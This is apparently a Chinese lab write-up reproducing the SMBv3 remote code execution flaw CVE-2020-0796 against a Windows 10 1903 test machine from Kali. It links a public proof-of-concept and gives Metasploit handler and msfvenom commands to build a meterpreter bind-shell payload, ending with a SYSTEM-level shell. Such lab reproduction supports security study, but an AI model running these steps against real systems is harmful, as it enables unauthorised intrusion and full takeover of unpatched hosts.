CEV-2020-0796复现

一、漏洞原理
该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的，它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。
二、影响版本
适用于32位系统的Windows 10版本1903
Windows 10 1903版（用于基于x64的系统）
Windows 10 1903版（用于基于ARM64的系统）
Windows Server 1903版（服务器核心安装）
适用于32位系统的Windows 10版本1909
Windows 10版本1909（用于基于x64的系统）
Windows 10 1909版（用于基于ARM64的系统）
Windows Server版本1909（服务器核心安装）
三、复现环境
靶机：win10_1903 IP:192.168.123.47
攻击机：kali IP:192.168.123.30

exp：https://github.com/dacade/CVE-POC/tree/master/CVE-2020-0796

四、复现过程
先在kali里开msf监听（exp后shell会反弹到监听窗口）
这里我们使用模块

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp

然后把对应参数设置好就行了

需要注意的是，我们使用的监听端口是3333，这是因为POC里指定的port是3333，如果要使用别的端口，可以用msf生成其他端口的shellcode。

msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt

然后将生成的shellcode替换exp中的exploit.py中的USER_PAYLOAD即可。
在开了监听后，可以直接执行POC了

然后任意按键就能退出exp，然后回到监听窗口就能拿到shell

而且直接就是system权限